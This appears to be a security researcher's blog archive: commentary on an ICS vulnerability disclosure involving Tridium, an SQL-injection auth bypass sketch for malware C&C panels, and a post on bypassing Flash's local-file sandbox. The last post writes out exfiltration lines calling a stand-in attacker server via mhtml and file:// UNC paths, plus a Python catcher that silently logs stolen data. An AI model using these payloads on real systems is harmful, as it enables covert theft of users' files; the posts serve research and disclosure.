Archive for the 'Security' Category

Thursday, July 12th, 2012

Tridium – An ICS Learning Moment…

We are happy to see Robert O’Harrow is shining a light on the vulnerabilities associated with Industrial Control Systems (ICS). The ICS software community is light years behind modern software security. Sadly, we can honestly say that the security of iTunes is more robust than that of most ICS software. Terry and I plan on releasing some technical details about what we’ve found in the near future, but for now we wanted to talk about some of our experiences with this particular issue.

First, ICS-CERT has done a great job tracking this issue. It’s been months since we first reported the issue to ICS-CERT, and following up with an unresponsive vendor is extremely frustrating. It was apparent that ICS-CERT was making every effort to follow up with Tridium, and they kept us well informed throughout the entire process. We especially want to thank those ICS-CERT analysts who kept us apprised of developments despite Tridium’s lack of response and unwillingness to accept responsibility for the issue.

We are disappointed that it took so long for the public to become aware of this issue. According to the Washington Post article, Tridium became aware of this vulnerability “almost a year ago, when a Niagara customer that uses the software to manage Pentagon facilities turned up issues in an audit”. We are disappointed that even after discovering critical, remotely exploitable vulnerabilities in Tridium software… our government chose to purchase and implement the software anyway. We are disappointed that our taxpayer money paid for the ignored security audit, paid for the acquisition, and paid for the implementation/deployment of known vulnerable software. We’d like to challenge our nation’s leadership to evaluate the failures in our current processes surrounding the acquisition of software that supports Critical Infrastructure and Industrial Control Systems.

At times, we felt like ICS-CERT had their hands tied. We realize that when you are working with vulnerabilities that could affect critical infrastructure, a delicate balance between disclosure and timely notification of affected organizations must be maintained. However, when a vendor is unresponsive or refuses to accept responsibility for an issue, ICS-CERT should have the authority to inform vulnerable customers in a timely manner. DHS and ICS-CERT work for us, the American people… they do not work for the PR departments of ICS companies. ICS-CERT should be able to take the appropriate actions to ensure that we’re safe and that ICS customers have the right information to mitigate and control risk. The PR damage done to any individual company should never be part of this equation. If a vendor is unresponsive or unwilling to accept responsibility for a security issue, ICS-CERT should have the option of disclosing issues 45 days after initial notification from external researchers (this is consistent with CERT/CC’s disclosure timelines). Of course, special circumstances require special handling, but we’re sure the folks at ICS-CERT can make those determinations when needed.

Probably the most disappointing part of the whole ordeal is Tridium’s eagerness to blame the customer. We’ve seen this from other ICS vendors as well. It should never be the customer’s responsibility to compensate for poor design. Many ICS vendors expect customers to ensure their product is implemented securely, yet provide zero (or extremely vague) guidance on how to do so. In many cases, secure deployment is simply impossible due to the extremely poor security design. Notification, automatic patching, and secure implementation guidelines in the ICS world are light years behind modern software. We don’t understand Tridium’s claim that “The firm also is doing more to train customers about security” when the root cause of these issues is poor design and coding practices at Tridium itself. Maybe Tridium should invest in training their developers about security first…

If you would like to contact us about our experiences, please email us at: help – at – fixicssecurity.com

Billy Rios @xssniper and Terry McCorkle @0psys

Posted by xssniper | Filed in ICS, Security | Comment now »


Friday, June 10th, 2011

Turning the Tables – Part II

I’m posting some of the research I’ve been working on over the last few months. I had planned on submitting some of this research to the Blackhat/DEFCON CFP, but it looks like I’ll be tied up for most of the summer and I won’t be able to make it out to Vegas for BH or DEFCON this year (pour some out and “make it rain” for me). The gist of the research is this: I’ve collected a number of malware C&C software packages. I set up these C&Cs in a virtual network and audited the applications and source code (when available) for bugs. The results were surprising; most of the C&C software audited has pretty crappy security.

This week’s sample is an auth bypass and SQL injection on a BlackEnergy C&C page. The first of the samples can be found here: http://software-security.sans.org/blog/2011/06/10/spot-the-vuln-rabbit-authbypass-and-sqli
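
To make the pattern concrete, here is a minimal, hypothetical Python sketch of the kind of login check behind this class of auth bypass. This is not the actual BlackEnergy code (the real sample is in the link above); the authenticate function, table name, and payloads are illustrative only.

    import sqlite3

    # Hypothetical login check, illustrative of the bug class -- NOT the
    # actual BlackEnergy code. User input is concatenated straight into
    # the SQL statement instead of being parameterized.
    def authenticate(db, username, password):
        query = ("SELECT id FROM users WHERE username = '%s' "
                 "AND password = '%s'" % (username, password))
        return db.execute(query).fetchone() is not None

    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES (1, 'admin', 'secret')")

    # Classic bypass: the injected quote and comment cut the password
    # check out of the query entirely, so no valid credentials are needed.
    print(authenticate(db, "admin' --", "wrong-password"))  # True

Parameterized queries are the obvious fix, which makes it all the more striking how rarely the audited packages used them.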

I’ll post more samples in the coming weeks.

Attacking malware C&C is an interesting proposition. Exploiting a single host can result in the transfer of hundreds or even thousands of hosts from one individual to another. I’m not the first to note that malware and C&C software is evolving. Gone are the days of simple IRC bots receiving clear-text commands from an IRC server. Today’s C&Cs are full-fledged, feature-rich applications with considerable complexity. Complexity is the enemy of security, and even malware authors cannot escape this; there is no magic bullet that exempts them from the difficulties of writing secure code. This is especially so if their customers are paying money for C&C software and demand new features and robust interfaces. Today’s malware landscape looks much like a typical software enterprise, with paying customers, regularly scheduled feature updates, marketing, and a sprinkling of PR. Who knows, maybe in the near future these malware enterprises will have dedicated, on-call security engineering teams and a formal SDL process :)

Posted by xssniper | Filed in Web Application Security | Comment now »


Tuesday, January 4th, 2011

Bypassing Flash’s local-with-filesystem Sandbox

A few weeks ago, I posted a description of a set of bugs that could be chained together to do “bad things”.  In the PoC I provided, a SWF file reads an arbitrary file from the victim’s local file system and passes the stolen content to an attacker’s server.

One of the readers (PZ) had a question about the SWF local-with-filesystem sandbox, which should prevent SWFs loaded from the local file system from passing data to remote systems. Looking at the documentation related to the sandbox, we see the following:

Local file describes any file that is referenced by using the file: protocol or a Universal Naming Convention (UNC) path. Local SWF files are placed into one of four local sandboxes:


The local-with-filesystem sandbox—For security purposes, Flash Player places all local SWF files and assets in the local-with-file-system sandbox, by default. From this sandbox, SWF files can read local files (by using the URLLoader class, for example), but they cannot communicate with the network in any way. This assures the user that local data cannot be leaked out to the network or otherwise inappropriately shared.

First, I think the documentation here is a bit too generous.  SWFs loaded from the local file system do face some restrictions.  The most relevant restrictions are probably:

  1. The SWF cannot make a call to JavaScript (or VBScript), either through a URL or via ExternalInterface
  2. The SWF cannot make an HTTP or HTTPS request
  3. Query string parameters (e.g. blah.php?querystring=qs-value) are stripped and will not be passed (even for requests to local files)

Unfortunately, these restrictions are not the same as “cannot communicate with the network in any way,” which is what the documentation states. The simplest way to bypass the local-with-filesystem sandbox is to simply use a file:// request to a remote server. For example, after loading the content from the local file system, an attacker can simply pass the contents to the attacker’s server via getURL() and a URL like: file://\\192.168.1.1\stolen-data-here\

Fortunately, it seems you can only pass IPs and hostnames for systems on the local network (RFC 1918 addresses). If an attacker wants to send data to a remote server on the Internet, they’ll have to resort to a couple of other tricks. A while back, I put up a post on the dangers of blacklisting protocol handlers. It’s basically impossible to create a list of “bad” protocol handlers in situations like this. In the case of the local-with-filesystem sandbox, Adobe has decided to prevent network access through the use of a protocol handler blacklist. If we can find a protocol handler that hasn’t been blacklisted by Adobe and allows for network communication, we win.
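
To get a feel for how big that search space is, here is a rough, Windows-only Python sketch (my own illustration, not part of the original PoC) that inventories registered handlers. Application-registered schemes show up as HKEY_CLASSES_ROOT subkeys carrying a "URL Protocol" value, while IE’s asynchronous pluggable protocols (mhtml among them) live under HKCR\PROTOCOLS\Handler.

    import winreg

    def subkeys(root, path=""):
        # Yield the names of all subkeys under root\path.
        key = winreg.OpenKey(root, path)
        i = 0
        while True:
            try:
                yield winreg.EnumKey(key, i)
            except OSError:      # no more subkeys
                return
            i += 1

    # Application-registered handlers are HKCR subkeys that carry a
    # "URL Protocol" value (e.g. mailto:, skype:, steam:).
    app_handlers = []
    for name in subkeys(winreg.HKEY_CLASSES_ROOT):
        try:
            with winreg.OpenKey(winreg.HKEY_CLASSES_ROOT, name) as k:
                winreg.QueryValueEx(k, "URL Protocol")
                app_handlers.append(name)
        except OSError:          # no "URL Protocol" value here
            continue

    # IE's asynchronous pluggable protocols -- mhtml shows up in this list.
    pluggable = list(subkeys(winreg.HKEY_CLASSES_ROOT, r"PROTOCOLS\Handler"))

    print(sorted(app_handlers))
    print(sorted(pluggable))

Any entry in either list that Adobe’s blacklist misses and that can carry data off-host is a candidate.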

There are a large number of protocol handlers that meet these criteria, but we’ll use the mhtml protocol handler as an example. The mhtml protocol handler is available on modern Windows systems, can be used without any prompts, and is not blacklisted by Flash. Using the mhtml protocol handler, it’s easy to bypass the Flash sandbox:

getURL('mhtml:http://attacker-server.com/stolen-data-here', '');

Some other benefits for using the mhtml protocol handler are:

  1. The request goes over HTTP/HTTPS on port 80/443, so it will get past most egress filtering
  2. If the request results in a 404, it will silently fail. The data will still be transmitted to the attacker’s server, but the victim will never see an indication of the transfer (see the sketch after this list)
  3. The protocol handler is available by default on Win7 and will launch with no protocol handler warning
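
For illustration, here is what the receiving end could look like: a minimal, hypothetical Python catcher (not part of the original PoC) that records whatever path arrives and deliberately answers 404. The stolen data rides in the URL of the mhtml request, so the transfer completes before the error response is ever sent.

    from http.server import BaseHTTPRequestHandler, HTTPServer

    class ExfilHandler(BaseHTTPRequestHandler):
        # Hypothetical attacker-side catcher, for illustration only.
        def do_GET(self):
            # self.path carries the exfiltrated data (e.g. /stolen-data-here)
            with open("exfil.log", "a") as log:
                log.write(self.path + "\n")
            self.send_response(404)   # data already arrived; victim sees nothing
            self.end_headers()

        def log_message(self, fmt, *args):
            pass                      # keep the console quiet

    if __name__ == "__main__":
        # Port 80 so the request blends into normal egress traffic
        # (binding to it may require elevated privileges).
        HTTPServer(("0.0.0.0", 80), ExfilHandler).serve_forever()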

There you go, an easy way to bypass Flash’s local-with-filesystem sandbox. Two lessons here. One, running untrusted code (whether it’s an executable, JavaScript, or even a SWF) is dangerous. Two, protocol handler blacklists are bad. Hope this helps PZ!

Posted by xssniper | Filed in Security | 36 Comments »